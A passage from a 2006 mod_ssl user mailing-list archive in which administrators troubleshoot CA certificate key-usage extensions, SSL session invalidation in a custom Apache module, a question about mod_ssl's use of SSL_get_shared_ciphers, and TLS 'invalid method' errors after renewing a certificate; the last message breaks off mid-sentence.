Organization: Carillon Information Security Inc.
MIME-version: 1.0
Content-type: text/plain; charset=utf-8
Content-transfer-encoding: 7BIT
Content-disposition: inline
References: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com>
 <200610111825.54190.ppatterson@carillonis.com>
 <2040.84.243.98.130.1160742098.squirrel@193.226.82.7>
User-Agent: KMail/1.9.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Patterson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 13 October 2006 08:21, BB wrote:
> > Are you able to post the certificate here? It sounds like the issue may
> > be the
> > key usage, or an entry in some other field - I've seen results like this
> > if
> > you don't have key agreement set, or some of the other fields mangled, or
> > particular security settings enabled in your certificate.
>
> Hi,
>
> Please find attached the CA cert and the server cert.
>
> I can successfully import the CA cert into IE, under Trusted Root
> Certification Authorities.
>
> If I download the server cert and open it from Windows (XP), it's
> description says:
>
> "This certification authority does not appear to be allowed to issue
> certificates or cannot be used as an end-entity certificate."
>
And that would most likely be your problem - the CA Certificate should have 
the following extensions:

Basic Constraints: CA:TRUE
Key Usage: DigitalSignature, CertificateSign, CrlSign

If you re-gen your CA Certificate with those usages, and then re-sign your 
Server certificate (which itself, should have the Key Usage extension set to 
digital Signature and key Encipherment), your issue should go away :)


-- 
Patrick Patterson
President and Chief PKI Architect
Carillon Information Security Inc.
http://www.carillon.ca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 13 15:00:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 13ECD14D867; Fri, 13 Oct 2006 15:00:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id C79B614D82B
	for ; Fri, 13 Oct 2006 14:59:59 +0200 (CEST)
Received: from werum815.werum.net (mailsmtp1.werum.net [172.20.104.15])
	by mx1.werum.de (Postfix) with ESMTP id 797AB31A8F0
	for ; Fri, 13 Oct 2006 14:59:47 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 73591932EE;
	Fri, 13 Oct 2006 14:59:44 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 02824-02; Fri, 13 Oct 2006 14:54:42 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id E609A932E9
	for ; Fri, 13 Oct 2006 14:59:42 +0200 (CEST)
Message-ID: <452F8DB5.5010100@werum.de>
Date: Fri, 13 Oct 2006 14:59:33 +0200
From: Eckard Wille 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Encrypted page would not load into IE
References: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com> <200610111825.54190.ppatterson@carillonis.com> <2040.84.243.98.130.1160742098.squirrel@193.226.82.7> <200610130846.59178.ppatterson@carillonis.com>
In-Reply-To: <200610130846.59178.ppatterson@carillonis.com>
X-Enigmail-Version: 0.94.0.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.898 tagged_above=-999 required=3 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Patrick Patterson schrieb:
> If you re-gen your CA Certificate with those usages, and then re-sign your 
> Server certificate (which itself, should have the Key Usage extension set to 
> digital Signature and key Encipherment), your issue should go away :)

There is also nice bundle of scripts from Yeak Nai Siew which
simplifies these steps a lot; especially for quick setups a nice
speedup: see http://www.openssl.org/contrib/ssl.ca-0.1.tar.gz

Greetings from Germany,
Eckard


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 13 15:47:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 726E314D884; Fri, 13 Oct 2006 15:47:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tep.ro (tep.ro [193.226.82.1])
	by master.modssl.org (Postfix) with ESMTP id 2A2CB14D82B
	for ; Fri, 13 Oct 2006 15:47:53 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 480326416D
	for ; Fri, 13 Oct 2006 16:44:56 +0300 (EEST)
X-Virus-Scanned: amavisd-new at tep.ro
Received: from mail.tep.ro ([127.0.0.1])
	by localhost (mail.tep.ro [127.0.0.1]) (amavisd-new, port 10024)
	with LMTP id l1Hyvyp0k4sY for ;
	Fri, 13 Oct 2006 16:44:52 +0300 (EEST)
Received: from 193.226.82.7 (localhost [127.0.0.1])
	by mail.tep.ro (Postfix) with ESMTP id 984FE6406E
	for ; Fri, 13 Oct 2006 16:44:52 +0300 (EEST)
Received: from 84.243.98.130
        (SquirrelMail authenticated user milie)
        by 193.226.82.7 with HTTP;
        Fri, 13 Oct 2006 16:44:52 +0300 (EEST)
Message-ID: <2183.84.243.98.130.1160747092.squirrel@193.226.82.7>
In-Reply-To: <452F8DB5.5010100@werum.de>
References: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com>
    <200610111825.54190.ppatterson@carillonis.com>
    <2040.84.243.98.130.1160742098.squirrel@193.226.82.7>
    <200610130846.59178.ppatterson@carillonis.com>
    <452F8DB5.5010100@werum.de>
Date: Fri, 13 Oct 2006 16:44:52 +0300 (EEST)
Subject: Re: Encrypted page would not load into IE
From: "BB" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-2
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BB" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thank you Michael, Patrick, Eckard!

Problem solved, case closed. ;-)

Apparently, the problem lies in the CA.sh (and CA.pl) script that ships by
default with open-ssl, at least on Slackware, and which generated the
faulty certificates.

Yeak Nai Siew's scripts worked like charm!

Thanks again!
BBR

> Patrick Patterson schrieb:
>> If you re-gen your CA Certificate with those usages, and then re-sign
>> your
>> Server certificate (which itself, should have the Key Usage extension
>> set to
>> digital Signature and key Encipherment), your issue should go away :)
>
> There is also nice bundle of scripts from Yeak Nai Siew which
> simplifies these steps a lot; especially for quick setups a nice
> speedup: see http://www.openssl.org/contrib/ssl.ca-0.1.tar.gz


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 24 15:53:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8B29614D884; Tue, 24 Oct 2006 15:53:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.hispeed.ch (mxout.hispeed.ch [62.2.95.247])
	by master.modssl.org (Postfix) with ESMTP id 54FD814D839
	for ; Tue, 24 Oct 2006 15:53:38 +0200 (CEST)
Received: from zaphod.hitchhiker.ch (84-73-54-197.dclient.hispeed.ch [84.73.54.197])
	(authenticated bits=0)
	by smtp.hispeed.ch (8.12.11.20060308/8.12.6/taifun-1.0) with ESMTP id k9ODrMso014623
	for ; Tue, 24 Oct 2006 15:53:25 +0200
Received: from localhost (unknown [127.0.0.1])
	by zaphod.hitchhiker.ch (Postfix) with ESMTP id A5CFC1EA93
	for ; Tue, 24 Oct 2006 12:54:39 +0000 (UTC)
Received: from zaphod.hitchhiker.ch ([127.0.0.1])
 by localhost (zaphod [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 02621-04 for ;
 Tue, 24 Oct 2006 14:54:23 +0200 (CEST)
Received: from [172.18.1.123] (adsl-135-98.dsl.init7.net [213.144.135.98])
	by zaphod.hitchhiker.ch (Postfix) with ESMTP id C51B61EA91
	for ; Tue, 24 Oct 2006 14:54:22 +0200 (CEST)
Message-ID: <453E1ACD.8030508@hitchhiker.ch>
Date: Tue, 24 Oct 2006 15:53:17 +0200
From: Serge Hauser 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache 2.x : Terminate SSL Session from own module ?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new / clamav (http://clamav.elektrapro.com) at hitchhiker.ch
X-DCC-spamcheck-01.tornado.cablecom.ch-Metrics: smtp-08.tornado.cablecom.ch 1377;
	Body=1 Fuz1=1 Fuz2=1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Serge Hauser 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

i try to terminate a session in my own module by setting the creation 
time and flushing the cache, unfortunately by the next request from the 
same client i get the same session again. (actually it seems to take it 
from the cache (ignoring the openssl sessioncache attributes).

is there any way i can force mod_ssl to explicitly invalidate a session 
so it will get deleted from the cache aswell ?

the code is use is basically:

r->connection->keepalive = -1;
ssl_sess = SSL_get_session(ssl);
ssl_ctx = SSL_get_SSL_CTX(ssl);
SSL_CTX_remove_session(ssl_ctx, ssl_sess);
SSL_SESSION_set_time(ssl_sess, 0);
SSL_CTX_flush_sessions(ssl_ctx, time(0));
ssl_sess->not_resumable = 1;


anyone has a hint for me what i am doing wrong or what i additionally 
need to do to get rid of the session ?

thanks
Serge

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 25 00:37:52 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 70B8E14D89A; Wed, 25 Oct 2006 00:37:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pythagoras.zen.co.uk (pythagoras.zen.co.uk [212.23.3.140])
	by master.modssl.org (Postfix) with ESMTP id B393E14D841
	for ; Wed, 25 Oct 2006 00:37:51 +0200 (CEST)
Received: from [82.68.229.246] (helo=[192.168.0.34])
	by pythagoras.zen.co.uk with esmtp (Exim 4.50)
	id 1GcUtt-0002Mh-8y
	for modssl-users@modssl.org; Tue, 24 Oct 2006 22:37:37 +0000
Message-ID: <453E95AF.10608@darkheim.freeserve.co.uk>
Date: Tue, 24 Oct 2006 23:37:35 +0100
From: Per Olausson 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Originating-Pythagoras-IP: [82.68.229.246]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Per Olausson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> Phil Ehrens:
> I just checked a couple different versions and did not see that
> function.

I posted a question about this to the apache security mailbox, but 
nobody responded. I guess that is inline with the policy for that 
mailbox even if I find it somewhat unhelpful, considering that SSL isn't 
completely a rarity when using Apache.

The reason I am concerned is because mod_ssl indirectly references 
SSL_get_shared_ciphers. It is in use. You can see this if you use 
something like nm and grep for this function.

So is mod_ssl vulnerable? Is the functionality insulated and not 
possible to trigger from the mod_ssl user scenario, or is it?

If anyone have any ideas please let me know!

Regards,


Per Olausson


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 25 01:10:50 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D68DF14D88A; Wed, 25 Oct 2006 01:10:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 4647914D841
	for ; Wed, 25 Oct 2006 01:10:49 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k9ONAXUD027389
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Tue, 24 Oct 2006 16:10:33 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4) with ESMTP id k9ONASmp003575
	for ; Tue, 24 Oct 2006 16:10:28 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4/Submit) id k9ONARtr003573
	for modssl-users@modssl.org; Tue, 24 Oct 2006 16:10:27 -0700
Date: Tue, 24 Oct 2006 16:10:27 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
Message-ID: <20061024231027.GA2382@ligo.caltech.edu>
References: <453E95AF.10608@darkheim.freeserve.co.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <453E95AF.10608@darkheim.freeserve.co.uk>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.12-2006-07-14
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 4873734 - a761fd6596fc
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Per Olausson wrote:
> 
> >Phil Ehrens:
> >I just checked a couple different versions and did not see that
> >function.
> 
> I posted a question about this to the apache security mailbox, but 
> nobody responded. I guess that is inline with the policy for that 
> mailbox even if I find it somewhat unhelpful, considering that SSL isn't 
> completely a rarity when using Apache.
> 
> The reason I am concerned is because mod_ssl indirectly references 
> SSL_get_shared_ciphers. It is in use. You can see this if you use 
> something like nm and grep for this function.
> 
> So is mod_ssl vulnerable? Is the functionality insulated and not 
> possible to trigger from the mod_ssl user scenario, or is it?
> 
> If anyone have any ideas please let me know!

The symbol is not defined in mod_ssl on any of my Linux or Solaris
systems, all of which are running Apache-2.0.55. What version are
you looking at?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 25 22:29:51 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DC80714D899; Wed, 25 Oct 2006 22:29:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from heisenberg.zen.co.uk (heisenberg.zen.co.uk [212.23.3.141])
	by master.modssl.org (Postfix) with ESMTP id AF55814D82B
	for ; Wed, 25 Oct 2006 22:29:49 +0200 (CEST)
Received: from [82.68.229.246] (helo=[192.168.0.34])
	by heisenberg.zen.co.uk with esmtp (Exim 4.50)
	id 1GcpNW-0002i7-NW
	for modssl-users@modssl.org; Wed, 25 Oct 2006 20:29:34 +0000
Message-ID: <453FC92C.5060900@darkheim.freeserve.co.uk>
Date: Wed, 25 Oct 2006 21:29:32 +0100
From: Per Olausson 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
References: <453E95AF.10608@darkheim.freeserve.co.uk> <20061024231027.GA2382@ligo.caltech.edu>
In-Reply-To: <20061024231027.GA2382@ligo.caltech.edu>
Content-Type: text/plain; charset=KOI8-R; format=flowed
Content-Transfer-Encoding: 7bit
X-Originating-Heisenberg-IP: [82.68.229.246]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Per Olausson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Phil,

Is it the way I am building Apache or is Linux or Solaris hiding this
symbol? I've checked this on a gentoo build, but on my machine the
module has no symbols.

Details as below:

Apache/2.2.3
OpenSSL 0.9.8c
AIX 5200-09
*
nm mod_ssl.so | grep SSL_get_shared_ciphers
.SSL_get_shared_ciphers T   269028692
.SSL_get_shared_ciphers_139_116 t   269031772*

nm(1):

T Global text symbol.
t Local text symbol.

Regards,


Per

Phil Ehrens wrote:
> Per Olausson wrote:
>   
>>> Phil Ehrens:
>>> I just checked a couple different versions and did not see that
>>> function.
>>>       
>> I posted a question about this to the apache security mailbox, but 
>> nobody responded. I guess that is inline with the policy for that 
>> mailbox even if I find it somewhat unhelpful, considering that SSL isn't 
>> completely a rarity when using Apache.
>>
>> The reason I am concerned is because mod_ssl indirectly references 
>> SSL_get_shared_ciphers. It is in use. You can see this if you use 
>> something like nm and grep for this function.
>>
>> So is mod_ssl vulnerable? Is the functionality insulated and not 
>> possible to trigger from the mod_ssl user scenario, or is it?
>>
>> If anyone have any ideas please let me know!
>>     
>
> The symbol is not defined in mod_ssl on any of my Linux or Solaris
> systems, all of which are running Apache-2.0.55. What version are
> you looking at?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>   


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 25 23:54:44 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 083DA14D899; Wed, 25 Oct 2006 23:54:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 6AACB14D82B
	for ; Wed, 25 Oct 2006 23:54:42 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k9PLsS2d001108
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Wed, 25 Oct 2006 14:54:28 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4) with ESMTP id k9PLsMwb016392
	for ; Wed, 25 Oct 2006 14:54:22 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.4/8.13.4/Submit) id k9PLsMnM016391
	for modssl-users@modssl.org; Wed, 25 Oct 2006 14:54:22 -0700
Date: Wed, 25 Oct 2006 14:54:22 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Does Mod_SSL use SSL_get_shared_ciphers()?
Message-ID: <20061025215422.GA16163@ligo.caltech.edu>
References: <453E95AF.10608@darkheim.freeserve.co.uk> <20061024231027.GA2382@ligo.caltech.edu> <453FC92C.5060900@darkheim.freeserve.co.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <453FC92C.5060900@darkheim.freeserve.co.uk>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.12-2006-07-14
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 4887853 - 84629c5130c1
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Interesting. Must be an Apache 2.2.X thing. The symbol
definitely does not appear in 2.0.55.

Per Olausson wrote:
> 
> Phil,
> 
> Is it the way I am building Apache or is Linux or Solaris hiding this
> symbol? I've checked this on a gentoo build, but on my machine the
> module has no symbols.
> 
> Details as below:
> 
> Apache/2.2.3
> OpenSSL 0.9.8c
> AIX 5200-09
> *
> nm mod_ssl.so | grep SSL_get_shared_ciphers
> .SSL_get_shared_ciphers T   269028692
> .SSL_get_shared_ciphers_139_116 t   269031772*
> 
> nm(1):
> 
> T Global text symbol.
> t Local text symbol.
> 
> Regards,
> 
> 
> Per
> 
> Phil Ehrens wrote:
> >Per Olausson wrote:
> >  
> >>>Phil Ehrens:
> >>>I just checked a couple different versions and did not see that
> >>>function.
> >>>      
> >>I posted a question about this to the apache security mailbox, but 
> >>nobody responded. I guess that is inline with the policy for that 
> >>mailbox even if I find it somewhat unhelpful, considering that SSL isn't 
> >>completely a rarity when using Apache.
> >>
> >>The reason I am concerned is because mod_ssl indirectly references 
> >>SSL_get_shared_ciphers. It is in use. You can see this if you use 
> >>something like nm and grep for this function.
> >>
> >>So is mod_ssl vulnerable? Is the functionality insulated and not 
> >>possible to trigger from the mod_ssl user scenario, or is it?
> >>
> >>If anyone have any ideas please let me know!
> >>    
> >
> >The symbol is not defined in mod_ssl on any of my Linux or Solaris
> >systems, all of which are running Apache-2.0.55. What version are
> >you looking at?
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >  
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.trenchman.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 26 13:32:12 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F19A014D886; Thu, 26 Oct 2006 13:32:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.hispeed.ch (mxout.hispeed.ch [62.2.95.247])
	by master.modssl.org (Postfix) with ESMTP id C2D2714D84B
	for ; Thu, 26 Oct 2006 13:32:09 +0200 (CEST)
Received: from zaphod.hitchhiker.ch (84-73-54-197.dclient.hispeed.ch [84.73.54.197])
	(authenticated bits=0)
	by smtp.hispeed.ch (8.12.11.20060308/8.12.6/taifun-1.0) with ESMTP id k9QBVtbK012001
	for ; Thu, 26 Oct 2006 13:31:55 +0200
Received: from localhost (unknown [127.0.0.1])
	by zaphod.hitchhiker.ch (Postfix) with ESMTP id 045BF1EA91
	for ; Thu, 26 Oct 2006 10:33:09 +0000 (UTC)
Received: from zaphod.hitchhiker.ch ([127.0.0.1])
 by localhost (zaphod [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 24140-09 for ;
 Thu, 26 Oct 2006 12:32:51 +0200 (CEST)
Received: from [172.18.1.123] (adsl-135-98.dsl.init7.net [213.144.135.98])
	by zaphod.hitchhiker.ch (Postfix) with ESMTP id 282951EA93
	for ; Thu, 26 Oct 2006 12:32:51 +0200 (CEST)
Message-ID: <45409C98.1000407@hitchhiker.ch>
Date: Thu, 26 Oct 2006 13:31:36 +0200
From: Serge Hauser 
User-Agent: Thunderbird 1.5.0.7 (Windows/20060909)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 2.x : Terminate SSL Session from own module ?
References: <453E1ACD.8030508@hitchhiker.ch>
In-Reply-To: <453E1ACD.8030508@hitchhiker.ch>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV version 0.88.5, clamav-milter version 0.88.5 on smtp-06.tornado.cablecom.ch
X-Virus-Scanned: by amavisd-new / clamav (http://clamav.elektrapro.com) at hitchhiker.ch
X-Virus-Status: Clean
X-DCC-spamcheck-02.tornado.cablecom.ch-Metrics: smtp-06.tornado.cablecom.ch 1378;
	Body=1 Fuz1=1 Fuz2=1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Serge Hauser 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

nevermind, i m using ssl_scache_remove() now, to invalidate the session, 
thats working perfectly.

mod_ssl stores a copy of the session in the cache, so any changes to the 
session object are lost when it gets retrieved from the cache again. i 
also noticed the openssl cacheoperation callback functions dont seem to 
work. (openssl 0.97)

serge
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 26 21:39:02 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7051314D899; Thu, 26 Oct 2006 21:39:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from macnexus.org (macnexus.org [63.175.152.19])
	by master.modssl.org (Postfix) with ESMTP id 59CA414D84B
	for ; Thu, 26 Oct 2006 21:39:00 +0200 (CEST)
Received: from [67.100.211.10] (account bdavies HELO [10.189.1.10])
  by macnexus.org (CommuniGate Pro SMTP 5.1.0)
  with ESMTPA id 19205871; Thu, 26 Oct 2006 12:38:41 -0700
Mime-Version: 1.0
Message-Id: 
Date: Thu, 26 Oct 2006 12:38:38 -0700
To: modssl-users@modssl.org
From: Bill Davies 
Subject: invalid method in ssl request
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bill Davies 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I was asked to renew an SSL certificate on our server, running Apache 
2.0.52/Unix. So prior to me touching anything, the SSL stuff was 
working.

I did a new CSR, generated a new key, and installed a new cert.crt 
with appropriate changes to httpd.conf (I put them in a new 
directory).

The test URL is this:

https://www.macnexus.org/customer/

Initially there was the error message (as presented via the above 
URL) and the log had an ASN1 encoding error.  I worked with Verisign 
and we resolved the ASN1 encoding error.

However, the new certificate still will not work.  The log shows:

Thu Oct 26 11:10:02 2006] [warn] Init: Session Cache is not 
configured [hint: SSLSessionCache]
[Thu Oct 26 11:10:03 2006] [notice] Digest: generating secret for 
digest authentication ...
[Thu Oct 26 11:10:03 2006] [notice] Digest: done
[Thu Oct 26 11:10:04 2006] [notice] Apache/2.0.52 (Unix) DAV/2 
PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7i configured -- resuming normal 
operations
[Thu Oct 26 11:10:56 2006] [error] [client 67.100.211.10] Invalid 
method in request \x16\x03\x01
[Thu Oct 26 11:53:13 2006] [error] [client 24.10.96.107] Invalid 
method in request \x80\x85\x01\x03\x01
[Thu Oct 26 11:53:13 2006] [error] [client 24.10.96.107] Invalid 
method in request \x16\x03
[Thu Oct 26 11:53:36 2006] [error] [client 24.10.96.107] Invalid 
method in request \x80\x85\x01\x03\x01
[Thu Oct 26 11:53:36 2006] [error] [client 24.10.96.107] Invalid 
method in request \x16\x03
[Thu Oct 26 12:08:41 2006] [error] [client 205.178.191.148] Invalid 
method in request \x16\x03\x01
[Thu Oct 26 12:33:35 2006] [error] [client 67.100.211.10] Invalid 
method in request \x16\x03\x01


The whole thing is rather odd because this web site had working SSL 
before I went to renew the certificate. The only thing I know is new 
is that Verisign now (as of a month ago) requires you to install 
their intermediate certificate and we never had to do that before.


I have reviewed httpd.conf and the 3 lines that would invoke ssl.conf 
are commented out, so it is my belief that the server was working 
before without loading ssl.conf settings.  However I have tried 
uncommenting out those lines just to see if anything changes, but it 
